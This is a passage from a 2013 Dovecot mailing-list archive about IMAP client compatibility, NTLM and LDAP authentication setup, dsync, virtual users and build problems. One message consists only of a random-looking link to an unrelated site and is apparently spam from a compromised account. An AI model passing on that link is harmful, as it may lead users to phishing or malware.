19:53:12 +0200 Subject: [Dovecot] MS asks for feedback on standards support in Outlook/Exchange In-Reply-To: <51AA3179.8050307@sys4.de> References: <51AA3179.8050307@sys4.de> Message-ID: <51AA3508.50105@sys4.de> Am 01.06.2013 13:40, schrieb Timo Sirainen: > On 1.6.2013, at 9.35, Robert Schetterer wrote: > >> Am 01.06.2013 00:28, schrieb Timo Sirainen: >>> Someone should at least mention that they should support the real SPECIAL-USE instead of just Gmail-specific XLIST.. >> >> i cant see any major Problems recent with i.e outlook 2013 and dovecot >> and SPECIAL-USE, perhaps look the screens at > > What about http://dovecot.org/list/dovecot/2013-May/090489.html ? > --- Outlook 2013 is only working when adding XLIST manually to imap_capability imap_capability = +XLIST --- i dont have this on my servers, and outlook 2013 works with special use as expected perhaps this helps http://social.technet.microsoft.com/Forums/de-DE/officeitpro/thread/eacaa110-ca10-463c-81ef-c313b7368ac5 --- You're welcome. Regarding your questions: Exchange 2010 and its supported (and unsupported and deviations from) IMAP standards are described on MS-STANXIMAP (MSDN). As far as I can tell, neither XLIST nor the enhanced (=extension of the standard) version of LIST is supported. Please keep in mind that this wouldn't matter very much, since most would connect to an Exchange 2010 server using either ActiveSync or MAPI/RPC. The following scenarios would definitely work: (A) your provider allows connections using ActiveSync (often referred to as "mobile" connection/access) and you're using Outlook 2013, (B) your provider allows connections using MAPI/RPC and you're using Outlook 2010. Outlook 2013 supports the extension specified in RFC 6154 and implements it using the XLIST command (as per MS-STANOIMAP), as documented in MS-STANOIMAP part 2.2.38; however, the LIST command in the same document doesn't mention the extension, so I'd assume it (Outlook 2013) doesn't necessarily support this feature using LIST as specified per RFC6154 (but only using explicitly XLIST.) Usually, any newer IMAP server supporting RFC6154 "LIST" ("XLIST") supports both the older XLIST as well as the newer LIST syntax. If it doesn't, a patch implementing this feature shouldn't be longer than a few (10 maybe?) lines of code and a few kind words to the developer team to get it into the next release of the server in question. --- http://msdn.microsoft.com/en-us/library/ee624430%28v=exchg.80%29.aspx ----------- V0061: The specification describes how to define an experimental command or any command that is not part of the specification. Microsoft Office Outlook 2007, Microsoft Outlook 2010 Outlook does not define any such commands. Microsoft Outlook 2013 Outlook 2013 implements the IMAP LIST extension specified in [RFC6154] as the XLIST command. --------------- so it may more a typical microsoft doku problem *g but however ,in fact no working trouble with dovecot SPECIAL-USE as far i remmeber to that list posting the problem whas there should get fixed was outlooks meaning of the Junk folder stuff, which is basicly done in another way by having its own antispam feature setup, so there are a few way to workaround that problem which i never tested and never will. My simple answer always is, Outlook is the client of exchange, with few stuff supporting normal internet mail ( imap etc ), dont use it with internet mail or live with its problems for notice Horde will implement Outlook 2013 complete active sync stack , so if that will happen, use active sync modus outlook 2013 with calender, abook, push mail , should no need for direct imap server con then, and it should "feel" like using exchnage ( but i think for one account only ), as horde has caldav and carddav , syncml too it can be used as middleware between many clients on many different os types i.e thunderbird lightning and k9 or native androids mail clients in exchange mode Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From rs at sys4.de Sat Jun 1 21:16:49 2013 From: rs at sys4.de (Robert Schetterer) Date: Sat, 01 Jun 2013 20:16:49 +0200 Subject: [Dovecot] MS asks for feedback on standards support in Outlook/Exchange In-Reply-To: <51AA3508.50105@sys4.de> References: <51AA3179.8050307@sys4.de> <51AA3508.50105@sys4.de> Message-ID: <51AA3A91.6090706@sys4.de> Am 01.06.2013 19:53, schrieb Robert Schetterer: > My simple answer always is, Outlook is the client of exchange, with few > stuff supporting normal internet mail ( imap etc ), dont use it with > internet mail or live with its problems After all, it may suprise some people, in real ,there is no Outlook 2013 or whatever outlook version, as every software, outlook versions have additional patchlevels , most times changes are small, but getting big with so called service packs. Exchange Admins in big win networks know this small changes by somnetimes their rising number support tickets after an upgrade or have to upgrade exchange same day So even a internet mail test with some Outlook version may work sometime, but it must not work the same after some outlook update or its results may differ To be fair ,same may happen with thunderbird etc too At last, i guess everyone who reads tecnet, might say that its quality is getting better of the years , but its not comparable to the high quality docs on big open source projects, also typical microsoft speech sometimes is hard to understand by naming stuff in other words like its allready used in open source projects, bad translating in other languages doubles the problems sometimes. Sometimes tecnet reading makes me laugh, by marketing features in new exchange version which allready exists in open source mailers since years...... Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From claus.r at bayern-mail.de Sun Jun 2 11:11:40 2013 From: claus.r at bayern-mail.de (Claus) Date: Sun, 02 Jun 2013 10:11:40 +0200 Subject: [Dovecot] rawlog without setting home in userdb Message-ID: <51AAFE3C.8080701@bayern-mail.de> Hi all, in my settup i decided to set mail_home in 10-mail.conf, and let dovecot do the hashing to a 2-level directory structure. mail_location = mdbox:~/mdbox:ALT=/altstorage/%h/mdbox mail_home = /vmail/%1Mu/%2.1Mu/%u In my userdb ist homedirectory not set and everythink works as expected, except when i use rawlog i get only logs in ~/dovecot.rawlog if home is set in userdb. In wiki http://wiki2.dovecot.org/Debugging/Rawlog it reads: If you don't have the home directory and you can't or don't want to modify userdb configuration, you can add: mail_home = /home/%u # or temporarily even e.g. mail_home = /tmp/temp-home Can you tell me, if my problem is the hashing-configuration or anything else? Claus From pasquale.davide at gmail.com Sun Jun 2 15:55:27 2013 From: pasquale.davide at gmail.com (Davide Pasquale) Date: Sun, 2 Jun 2013 14:55:27 +0200 Subject: [Dovecot] =Davide Pasquale= Message-ID: http://archiv.isusice.eu/ewcyozyg/fltdigdpmijtefzkeuuepzdutvxu.hnfzuk From mariajose1982 at gmail.com Mon Jun 3 05:33:11 2013 From: mariajose1982 at gmail.com (=?ISO-8859-1?Q?Maria_Jose_Ya=F1ez_Dacosta?=) Date: Sun, 2 Jun 2013 23:33:11 -0300 Subject: [Dovecot] Settings: Dovecot + NTLM + Single Sing On + Windows + Outlook or Thunderbird. In-Reply-To: <51A9DCBE.2020908@Media-Brokers.com> References: <51A78155.8030804@Media-Brokers.com> <51A9DCBE.2020908@Media-Brokers.com> Message-ID: Sorry for the bad drafting, writing is the clearest :). I want to install dovecot on a linux server (centos 6) so that users accessing from windows do not have to enter the password (single sign on). I am following this explanation http://wiki2.dovecot.org/HowTo/ActiveDirectoryNtlm There are steps that fail settings in version 2.1.16. 1) mechanisms = plain ntlm login 2) userdb static { args= uid=501 gid=501 home=/home/vmail/%1Ln/%Ln mail=maildir:/home/vmail/%d/%1Ln/%Ln:INBOX=/home/vmail/%d/%1Ln/%Ln allow_all_users=yes } Not recognize them. Honestly, I have no experience configuring dovecot and would need some help. Segurmante this forgetting me some things and not others take them correctly. Another question I have is if I have to set something in particular in PAM. I show what I have now (doveconf-n): # 2.1.16: /usr/local/etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.6.2.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_use_winbind = yes namespace inbox { inbox = yes location = mailbox Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use = \Sent } mailbox Trash { special_use = \Trash } passdb { driver = pam } protocols = imap pop3 ssl = no userdb { args = uid=10000 gid=10000 home=/mail/%d/%n allow_all_users=yes driver = static } As I discuss, I is working and if I look at the log (In / var / log / maillog) When I do telnet localhost imap shows me this: May 31 15:45:55 prueba-mail dovecot: master: Dovecot v2.1.16 starting up (core dumps disabled) May 31 15:46:04 prueba-mail dovecot: auth: Fatal: Support not compiled in for passdb driver 'pam' May 31 15:46:04 prueba-mail dovecot: master: Error: service(auth): command startup failed, throttling for 2 secs May 31 15:46:04 prueba-mail dovecot: imap-login: Disconnected: Auth process broken (disconnected before greeting, waited 0 secs): user=<>, rip=::1, lip=::1, secured, session= Thank you very much for any help! 2013/6/1 Charles Marcus > Fix your line wrapping. The below is way too difficult to read for most > people to waste time trying to decipher. > > > On 2013-05-31 3:02 PM, Maria Jose Ya?ez Dacosta > wrote: > >> If I do "doveconf -n" it show >> >> # 2.1.16: /usr/local/etc/dovecot/**dovecot.conf # OS: Linux >> 2.6.32-358.6.2.el6.x86_64 x86_64 CentOS release 6.4 (Final) >> auth_use_winbind = yes namespace inbox { inbox = yes location = mailbox >> Drafts { special_use = \Drafts } mailbox Junk { special_use = \Junk } >> mailbox Sent { special_use = \Sent } mailbox "Sent Messages" { special_use >> = \Sent } mailbox Trash { special_use = \Trash } prefix = } passdb { >> driver >> = pam } protocols = imap pop3 ssl = no userdb { args = uid=10000 gid=10000 >> home=/mail/%d/%n allow_all_users=yes driver = static } >> The things I do not recognize are: >> >> mechanisms = plain ntlm login >> > > > -- > > Best regards, > > Charles Marcus > I.T. Director > Media Brokers International, Inc. > 678.514.6224 | 678.514.6299 fax > > > -- Maria Jos? From janfrode at tanso.net Mon Jun 3 11:11:59 2013 From: janfrode at tanso.net (Jan-Frode Myklebust) Date: Mon, 3 Jun 2013 10:11:59 +0200 Subject: [Dovecot] Bad exit status from dsync Message-ID: <20130603081159.GA11334@mushkin.tanso.net> I just tried to migrate one of my users from maildir to mdbox using dsync. My conversion script is checking the dsync exit code to know if the conversion goes fine or not, and surprisingly dsync returned "0" at the same time as it gave the error: Error: Failed to sync mailbox .ta\ vare\ p? ... (sorry, lost the rest of the error message) Changing the folder name to mUTF7 manually made it work, but I didn't like that dsync returned success when it got this error. That breaks the failsafe logic in my conversion script. Dovecot version dovecot-ee-2.1.16.3-1, x86_64, RHEL5. Dsync command used: dsync -v -u username at example.net mirror maildir:/usr/local/atmail/users/u/s/username at example.net With these dovecot.conf settings: mail_home = /srv/mailstore/%256LRHu/%Ld/%Ln mail_location = mdbox:~/mdbox -jf From Olivier.Girard at univ-angers.fr Mon Jun 3 16:47:08 2013 From: Olivier.Girard at univ-angers.fr (Olivier Girard) Date: Mon, 03 Jun 2013 15:47:08 +0200 Subject: [Dovecot] Please clarify one point for me on director userdb (Was: Configuration advice needed.) In-Reply-To: <51A880F9.80902@univ-angers.fr> References: <51A880F9.80902@univ-angers.fr> Message-ID: <51AC9E5C.4030003@univ-angers.fr> I'm trying to finish my dovecot setup but things are unclear for me. I want director proxying mapping to same server for LMTP and POP/IMAP connections. My authdb is LDAP and LMTP user are queried with mail adress (ldap mail attribute) while IMAP/POP users are identified with uid (ldap uid attribute) wich is completly different. So i end up defining my ldap querys mapping ldap mail attribute to user in *_attrs (best choice for future use than uid for our setup) with this configuration in dovecot-ldap.conf.ext: uris = ldap://ldap.uang dn = cn=acces-smtp, ou=access, dc=univ-angers, dc=fr dnpass = ********* base = ou=people, dc=univ-angers, dc=fr user_attrs = mail=user,homeDirectory=home user_filter = (&(|(uid=%u) (mail=%u) (auaAliasEmail=%u))(|(auaStatut=etu)(auaStatut=etu-sortant)(auaStatut=perso)(auaStatut=perso-sortant))) pass_attrs = mail=user,userPassword=password pass_filter = (&(|(uid=%u) (mail=%u) (auaAliasEmail=%u)) (|(auaStatut=etu)(auaStatut=etu-sortant)(auaStatut=perso)(auaStatut=perso-sortant))) iterate_attrs = mail=user iterate_filter = (|(auaStatut=etu)(auaStatut=etu-sortant)(auaStatut=perso)(auaStatut=perso-sortant)) default_pass_scheme = MD5-CRYPT Is it the correct method, or do i miss something? Le 31/05/2013 12:52, Olivier Girard a ?crit : > Hello, > > First, thanks for this great piece of software. > > I'm new to dovecot and i've just converted my old courier configuration > on pop/imap server side, everithing is working just fine on this side > and speed gain expected was found (not enough for our busy servers :). > > Setup is done with 3 dovecot virtual servers load balanced with a > Hardware load balancer (this part is a big point of the question). > Postfix and dovecot servers use an NFS share on a NetApp for mail, > Postfix servers are writting directly to inbox maildirs. > > Load balanced is maintaining afinity betwen client and server so i've > got no problem with this for the moment. > > Now, i want to setup postfix (3 HW load balanced) for local delivery > with LMTP on deovecot servers, and here come my questions. > > Afinity can't be maintained between IMAP and LMTP for a user with my > load balancer so mail can be delivered on dovecot01 and read on > dovecot02, from what i've read this can be an issue with indexes. > > I think i need to setup a director to maintain LMTP and IMAP afinity > between users and servers but on imap servers i'm identifying user > with their UID, and LMTP need to see emails. > Does dovecot see the same user or 2 users with the same homedir? > > So my question is: could you point me to the right direction with this > setup, do you have any advice on this config. > From dukedougal at gmail.com Mon Jun 3 16:23:09 2013 From: dukedougal at gmail.com (dd) Date: Mon, 3 Jun 2013 06:23:09 -0700 (PDT) Subject: [Dovecot] An unconstructive grumble Message-ID: <1370265789582-42598.post@n4.nabble.com> 5 hours of configuration attempts, error after confusing error, documentation with examples that only show extracts of working configurations. I really feel like throwing in the towel with dovecot. It should not be this hard and frankly almost impossible to understand and configure for such an incedibly simple configuration. /home/vmail/domain.name/username/cur /home/vmail/domain.name/username/new /home/vmail/domain.name/username/tmp 3 virtual users. All I want is a username and password to access my email. I have to have hit every error and problem there can be. No response at all from server, unable to find password file, unable to recognise user, invalid password. God it went on and on and on for five or more hours. For such a simple config. I know this is a totally unconstructive complaint and I should be taking the time to set out a careful explanation of my problem along with errors and logfiles but I just can't be bothered. I've tried so many many configurations and options and nothing works. How can it possibly be this hard to ghet some emails off the server with simple username/password configurations. Go ahead and flame me to a crisp. -- View this message in context: http://dovecot.2317879.n4.nabble.com/An-unconstructive-grumble-tp42598.html Sent from the Dovecot mailing list archive at Nabble.com. From rob0 at gmx.co.uk Mon Jun 3 17:48:54 2013 From: rob0 at gmx.co.uk (/dev/rob0) Date: Mon, 3 Jun 2013 09:48:54 -0500 Subject: [Dovecot] An unconstructive grumble In-Reply-To: <1370265789582-42598.post@n4.nabble.com> References: <1370265789582-42598.post@n4.nabble.com> Message-ID: <20130603144854.GA13843@harrier.slackbuilds.org> On Mon, Jun 03, 2013 at 06:23:09AM -0700, dd wrote: > 5 hours of configuration attempts, error after confusing error, > documentation with examples that only show extracts of working > configurations. I really feel like throwing in the towel with > dovecot. > > It should not be this hard ... Why not? You're really not in a position to make this claim. But having said that... > and frankly almost impossible to understand and configure for > such an incedibly simple configuration. > > /home/vmail/domain.name/username/cur > /home/vmail/domain.name/username/new > /home/vmail/domain.name/username/tmp > > 3 virtual users. All I want is a username and password to > access my email. ... you complicated things by wanting virtual users. System users would have been much simpler to set up. Also, you missed the fact that virtual users should have a $HOME directory just like system users: http://wiki2.dovecot.org/VirtualUsers http://wiki2.dovecot.org/VirtualUsers/Home The only constructive suggestion I can make here is to scrap it and start over with system users. Let PAM / your OS handle the username and password and other daunting tasks. -- http://rob0.nodns4.us/ -- system administration and consulting Offlist GMX mail is seen only if "/dev/rob0" is in the Subject: From me at junc.eu Mon Jun 3 17:49:32 2013 From: me at junc.eu (Benny Pedersen) Date: Mon, 03 Jun 2013 16:49:32 +0200 Subject: [Dovecot] An unconstructive grumble In-Reply-To: <1370265789582-42598.post@n4.nabble.com> References: <1370265789582-42598.post@n4.nabble.com> Message-ID: <42456a9cff36ef88779215f540d8f18a@junc.eu> dd skrev den 2013-06-03 15:23: > Go ahead and flame me to a crisp. why not join the fun of google apps mx ? :) dovecot is not for everyone if you like more help provide "dovecot -n" and if using postfix "postconf -n", what a combo ? -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From bdh at machinehum.com Mon Jun 3 17:53:11 2013 From: bdh at machinehum.com (Brian Hayden) Date: Mon, 3 Jun 2013 09:53:11 -0500 Subject: [Dovecot] An unconstructive grumble In-Reply-To: <20130603144854.GA13843@harrier.slackbuilds.org> References: <1370265789582-42598.post@n4.nabble.com> <20130603144854.GA13843@harrier.slackbuilds.org> Message-ID: On Jun 3, 2013, at 9:48 AM, /dev/rob0 wrote: > The only constructive suggestion I can make here is to scrap it and > start over with system users. Let PAM / your OS handle the username > and password and other daunting tasks. +1. I've spent a lot of time waist-deep in dovecot, but one of the things I love about it is that when I need to set up IMAP mail access for a couple users for someone's home or business, it can be done in less than ten minutes. Create the system users, change about four lines in the default configuration, and done. -brian From CMarcus at Media-Brokers.com Mon Jun 3 18:01:54 2013 From: CMarcus at Media-Brokers.com (Charles Marcus) Date: Mon, 03 Jun 2013 11:01:54 -0400 Subject: [Dovecot] An unconstructive grumble In-Reply-To: <1370265789582-42598.post@n4.nabble.com> References: <1370265789582-42598.post@n4.nabble.com> Message-ID: <51ACAFE2.5040902@Media-Brokers.com> Most problems like this can be attributed to trying to follow some $Random_HowTo from the internet, rather than reading the dovecot docs themselves. But yeah, ranting like you just did without providing any details at all is totally counter-productive, and is likely to get you flamed - or more probably just ignored. On 2013-06-03 9:23 AM, dd wrote: > 5 hours of configuration attempts, error after confusing error, documentation > with examples that only show extracts of working configurations. I really > feel like throwing in the towel with dovecot. > > It should not be this hard and frankly almost impossible to understand and > configure for such an incedibly simple configuration. > > /home/vmail/domain.name/username/cur > /home/vmail/domain.name/username/new > /home/vmail/domain.name/username/tmp > > 3 virtual users. All I want is a username and password to access my email. > > I have to have hit every error and problem there can be. No response at all > from server, unable to find password file, unable to recognise user, invalid > password. God it went on and on and on for five or more hours. For such a > simple config. > > I know this is a totally unconstructive complaint and I should be taking the > time to set out a careful explanation of my problem along with errors and > logfiles but I just can't be bothered. I've tried so many many > configurations and options and nothing works. How can it possibly be this > hard to ghet some emails off the server with simple username/password > configurations. > > Go ahead and flame me to a crisp. From simon.buongiorno at gmail.com Mon Jun 3 18:10:35 2013 From: simon.buongiorno at gmail.com (Simon B) Date: Mon, 3 Jun 2013 17:10:35 +0200 Subject: [Dovecot] An unconstructive grumble In-Reply-To: <20130603144854.GA13843@harrier.slackbuilds.org> References: <1370265789582-42598.post@n4.nabble.com> <20130603144854.GA13843@harrier.slackbuilds.org> Message-ID: On 3 Jun 2013 16:49, "/dev/rob0" wrote: > > On Mon, Jun 03, 2013 at 06:23:09AM -0700, dd wrote: > > 5 hours of configuration attempts, error after confusing error, > > documentation with examples that only show extracts of working > > configurations. I really feel like throwing in the towel with > > dovecot. > > > > It should not be this hard ... > > Why not? You're really not in a position to make this claim. But > having said that... > > > and frankly almost impossible to understand and configure for > > such an incedibly simple configuration. > > > > /home/vmail/domain.name/username/cur > > /home/vmail/domain.name/username/new > > /home/vmail/domain.name/username/tmp > > > > 3 virtual users. All I want is a username and password to > > access my email. > > ... you complicated things by wanting virtual users. System users > would have been much simpler to set up. Also, you missed the fact > that virtual users should have a $HOME directory just like system > users: I've never understood this antipathy to virtual users. But your knowledge is greater than mine :) > http://wiki2.dovecot.org/VirtualUsers > http://wiki2.dovecot.org/VirtualUsers/Home I sort of see why for legacy reasons a $home directory might once have been needed. But surely however you word it all you're doing is telling the server where to put the mails, the structure you want and the format of the files. 3 variables... Simon From rob0 at gmx.co.uk Mon Jun 3 18:21:26 2013 From: rob0 at gmx.co.uk (/dev/rob0) Date: Mon, 3 Jun 2013 10:21:26 -0500 Subject: [Dovecot] An unconstructive grumble In-Reply-To: References: <1370265789582-42598.post@n4.nabble.com> <20130603144854.GA13843@harrier.slackbuilds.org> Message-ID: <20130603152126.GB13843@harrier.slackbuilds.org> On Mon, Jun 03, 2013 at 05:10:35PM +0200, Simon B wrote: > On 3 Jun 2013 16:49, "/dev/rob0" wrote: > > On Mon, Jun 03, 2013 at 06:23:09AM -0700, dd wrote: > > > > > > 3 virtual users. All I want is a username and password to > > > access my email. > > > > ... you complicated things by wanting virtual users. System > > users would have been much simpler to set up. Also, you > > missed the fact that virtual users should have a $HOME > > directory just like system users: > > I've never understood this antipathy to virtual users. But your > knowledge is greater than mine :) My antipathy? I have none. Virtual users are ideal in certain circumstances. They are NOT ideal for people who are just starting out and have no idea how all the pieces fit and work together. That way lies frustration and madness (and if you noticed, a very high percentage of the questions we see on this list.) I started out with system users, and I learned how it all works. Taking it a piece at a time is always best when starting into unfamiliar territory. > > http://wiki2.dovecot.org/VirtualUsers > > http://wiki2.dovecot.org/VirtualUsers/Home > > I sort of see why for legacy reasons a $home directory might once > have been needed. But surely however you word it all you're doing > is telling the server where to put the mails, the structure you > want and the format of the files. 3 variables... No, there are other files kept in the $HOME. Quoting the link: " Some uses for home directory are: - By default Sieve scripts are in user's home directory. - Duplicate mail check database is in user's home directory. Suppression of duplicate rejects/vacations won't work if home directory isn't specified. - Debugging: If an imap or pop3 process crashes, the core file is written to the user's home directory. " -- http://rob0.nodns4.us/ -- system administration and consulting Offlist GMX mail is seen only if "/dev/rob0" is in the Subject: From Harlan.Stenn at pfcs.com Mon Jun 3 21:29:38 2013 From: Harlan.Stenn at pfcs.com (Harlan Stenn) Date: Mon, 03 Jun 2013 14:29:38 -0400 Subject: [Dovecot] An unconstructive grumble In-Reply-To: <1370265789582-42598.post@n4.nabble.com> References: <1370265789582-42598.post@n4.nabble.com> Message-ID: <20130603182938.E9E342842F@gwc.pfcs.com> If you're hosting this on the domain where the users will have email, then do you have a good reason for wanting to use virtual stuff? If not, use system users. If you are hosting for another domain (or plan to) I don't have enough info to tell you more - I routinely set up virtual domains (I use postfixadmin for most of this maintenance. I probably followed the instructions in the dovecot virtual user readme file(s). H From janfrode at tanso.net Mon Jun 3 21:40:47 2013 From: janfrode at tanso.net (Jan-Frode Myklebust) Date: Mon, 3 Jun 2013 20:40:47 +0200 Subject: [Dovecot] Please clarify one point for me on director userdb (Was: Configuration advice needed.) In-Reply-To: <51AC9E5C.4030003@univ-angers.fr> References: <51A880F9.80902@univ-angers.fr> <51AC9E5C.4030003@univ-angers.fr> Message-ID: <20130603184047.GA8060@mushkin.tanso.net> On Mon, Jun 03, 2013 at 03:47:08PM +0200, Olivier Girard wrote: > I'm trying to finish my dovecot setup but things are unclear for me. > > I want director proxying mapping to same server for LMTP and POP/IMAP > connections. My authdb is LDAP and LMTP user are queried with mail > adress (ldap mail attribute) while IMAP/POP users are identified > with uid (ldap uid attribute) wich is completly different. > > So i end up defining my ldap querys mapping ldap mail attribute to user > in *_attrs (best choice for future use than uid for our setup) with this > configuration in dovecot-ldap.conf.ext: > > uris = ldap://ldap.uang > dn = cn=acces-smtp, ou=access, dc=univ-angers, dc=fr > dnpass = ********* > base = ou=people, dc=univ-angers, dc=fr > user_attrs = mail=user,homeDirectory=home > user_filter = (&(|(uid=%u) (mail=%u) (auaAliasEmail=%u))(|(auaStatut=etu)(auaStatut=etu-sortant)(auaStatut=perso)(auaStatut=perso-sortant))) > pass_attrs = mail=user,userPassword=password > pass_filter = (&(|(uid=%u) (mail=%u) (auaAliasEmail=%u)) (|(auaStatut=etu)(auaStatut=etu-sortant)(auaStatut=perso)(auaStatut=perso-sortant))) > iterate_attrs = mail=user > iterate_filter = (|(auaStatut=etu)(auaStatut=etu-sortant)(auaStatut=perso)(auaStatut=perso-sortant)) > default_pass_scheme = MD5-CRYPT > > Is it the correct method, or do i miss something? > It's a bit hard to tell what's unclear to you. This all looks perfectly fine to me. I run a similar configuration, except: - I don't have any ldap config on the directors, just a static passdb: passdb { args = proxy=y nopassword=y driver = static } - I use auth binds, instead having dovecot do the authentication. IMHO that's better, since then there's no easy way to extract all the hashes from the dovecot side. auth_bind = yes auth_bind_userdn = uid=%n,ou=people,o=%d,o=ISP,o=example,c=NO - I haven't configured any iterate_attrs/iterate_filter/pass_attrs/iterate_filter or default_pass_scheme. Have too many users to ever want to iterate over them all :-) -jf From eric at ericabrahamsen.net Tue Jun 4 06:21:11 2013 From: eric at ericabrahamsen.net (Eric Abrahamsen) Date: Tue, 04 Jun 2013 11:21:11 +0800 Subject: [Dovecot] recursive mail_location? References: <87obbt42oy.fsf@ericabrahamsen.net> <1579535.YRSr3nuAER@karol1-530u3c-530u4c> <87wqqggf3w.fsf@ericabrahamsen.net> <87fvx2dt81.fsf@ericabrahamsen.net> <34713524-94BF-407D-9040-7C030116FD91@iki.fi> Message-ID: <871u8ibly0.fsf@ericabrahamsen.net> Timo Sirainen writes: > On 1.6.2013, at 13.24, Eric Abrahamsen wrote: > >> Eric Abrahamsen writes: >> >>> Karol Jurak writes: >>> >>>> On Thursday 30 of May 2013 10:33:01 Eric Abrahamsen wrote: >>>>> Does anyone have a recommended way of handling this? Is it possible to >>>>> either "flatten" the structure further, or somehow tell dovecot to >>>>> recurse into directories? I don't mind having a separate gnus server >>>>> for each mail account, but I'd hate to have to do one per mailbox. >>>> >>>> Maybe setting LAYOUT=fs (and possibly DIRNAME) in mail_location could >>>> somehow help you? >>>> >>>> More on this settings is here: >>>> >>>> http://wiki2.dovecot.org/MailLocation/Maildir >> >> Hmm, googling further leads me to believe that dovecot and isync/mbsync >> simply won't work together out of the box, as they keep uid validity in >> different formats: >> >> http://dovecot.2317879.n4.nabble.com/More-detail-re-dovecot-uidlist-and-uidvalidity-files-td39232.html > > There is only one format for IMAP UIDVALIDITY. dovecot-uidlist stores > the UIDVALIDITY in hex, but it's still visible as a regular base10 > integer via IMAP. I don't know about isync, mbsync or gnus. Ah, all right. Perhaps they're just stored in different locations then. At any rate, it looks like it's going to be more work than it's worth to make these work together. Thanks, Eric From kengheng at mysql.cc Tue Jun 4 12:28:41 2013 From: kengheng at mysql.cc (kengheng) Date: Tue, 04 Jun 2013 17:28:41 +0800 Subject: [Dovecot] Make install error In-Reply-To: <20130517111233.GO52079@anubis.morrow.me.uk> References: <5170BEF0.6060306@mysql.cc> <1366713011.11047.345.camel@innu> <51776D42.1080103@mysql.cc> <20130424155049.GB66499@anubis.morrow.me.uk> <5193566E.7030303@mysql.cc> <20130517111233.GO52079@anubis.morrow.me.uk> Message-ID: <51ADB349.6060700@mysql.cc> Hi, yes, the configure without "--libexecdir" . and i found this comment from config.log: | # If user did not specify libexecdir, set the correct target: | # Nor FHS nor openSUSE allow prefix/libexec. Let's default to prefix/lib. | | if test "$libexecdir" = '${exec_prefix}/libexec' ; then | libexecdir='${exec_prefix}/lib' | fi On 5/17/13 7:12 PM, Ben Morrow wrote: > At 5PM +0800 on 15/05/13 you (kengheng) wrote: >> On 4/24/13 11:50 PM, Ben Morrow wrote: >>> At 1PM +0800 on 24/04/13 you (kengheng) wrote: >>>> Hi, I tried remove and make install, same err happended. I noticed from >>>> the log below, it first generate the >>>> "/usr/local/dovecot/lib/dovecot/auth" with checkpassword-reply, and it >>>> is success, the coming generation directory for auth at >>>> "/usr/local/dovecot/lib/dovecot/", it is weird that the make install >>>> generation for file auth and directory auth at same path. It is causing >>>> the issues. >>>> >>>> make[3]: Entering directory `/usr/local/src/dovecot-2.2.1/src/auth' >>>> test -z "/usr/local/dovecot/lib/dovecot" || /usr/bin/mkdir -p >>>> "/usr/local/dovecot/lib/dovecot" >>>> /bin/sh ../../libtool --mode=install /usr/bin/install -c auth >>>> checkpassword-reply '/usr/local/dovecot/lib/dovecot' >>> These files should be installed under libexec; probably >>> /usr/local/dovecot/libexec/dovecot, though I'm not sure how autoconf >>> chooses the libexec directory when you're using an explicit prefix. What >>> do the following give you (in the top-level Dovecot source dir)? >>> >>> grep ^libexecdir config.log >>> grep ^exec_prefix config.log >>> grep ^prefix config.log >> grep ^libexecdir config.log >> libexecdir='${exec_prefix}/lib' >> >> grep ^exec_prefix config.log >> exec_prefix='${prefix}' >> >> grep ^prefix config.log >> prefix='/usr/local/dovecot' > That's weird, and wrong. Also, I can't reproduce it; if I run > > ./configure --prefix=/usr/local/dovecot > grep ^libexec config.log > > in the 2.2.1 tarball I get > > libexecdir='${exec_prefix}/libexec' > > as I would have expected. Are you sure you didn't pass a --libexecdir > argument to configure? > > Ben > > > From kengheng at mysql.cc Tue Jun 4 12:29:47 2013 From: kengheng at mysql.cc (kengheng) Date: Tue, 04 Jun 2013 17:29:47 +0800 Subject: [Dovecot] Make install error In-Reply-To: <20130517111233.GO52079@anubis.morrow.me.uk> References: <5170BEF0.6060306@mysql.cc> <1366713011.11047.345.camel@innu> <51776D42.1080103@mysql.cc> <20130424155049.GB66499@anubis.morrow.me.uk> <5193566E.7030303@mysql.cc> <20130517111233.GO52079@anubis.morrow.me.uk> Message-ID: <51ADB38B.6040507@mysql.cc> For your note, I'm installing dovecot on opensuse (32bits) 12.2 and 12.3 , both produced the same errors. On 5/17/13 7:12 PM, Ben Morrow wrote: > At 5PM +0800 on 15/05/13 you (kengheng) wrote: >> On 4/24/13 11:50 PM, Ben Morrow wrote: >>> At 1PM +0800 on 24/04/13 you (kengheng) wrote: >>>> Hi, I tried remove and make install, same err happended. I noticed from >>>> the log below, it first generate the >>>> "/usr/local/dovecot/lib/dovecot/auth" with checkpassword-reply, and it >>>> is success, the coming generation directory for auth at >>>> "/usr/local/dovecot/lib/dovecot/", it is weird that the make install >>>> generation for file auth and directory auth at same path. It is causing >>>> the issues. >>>> >>>> make[3]: Entering directory `/usr/local/src/dovecot-2.2.1/src/auth' >>>> test -z "/usr/local/dovecot/lib/dovecot" || /usr/bin/mkdir -p >>>> "/usr/local/dovecot/lib/dovecot" >>>> /bin/sh ../../libtool --mode=install /usr/bin/install -c auth >>>> checkpassword-reply '/usr/local/dovecot/lib/dovecot' >>> These files should be installed under libexec; probably >>> /usr/local/dovecot/libexec/dovecot, though I'm not sure how autoconf >>> chooses the libexec directory when you're using an explicit prefix. What >>> do the following give you (in the top-level Dovecot source dir)? >>> >>> grep ^libexecdir config.log >>> grep ^exec_prefix config.log >>> grep ^prefix config.log >> 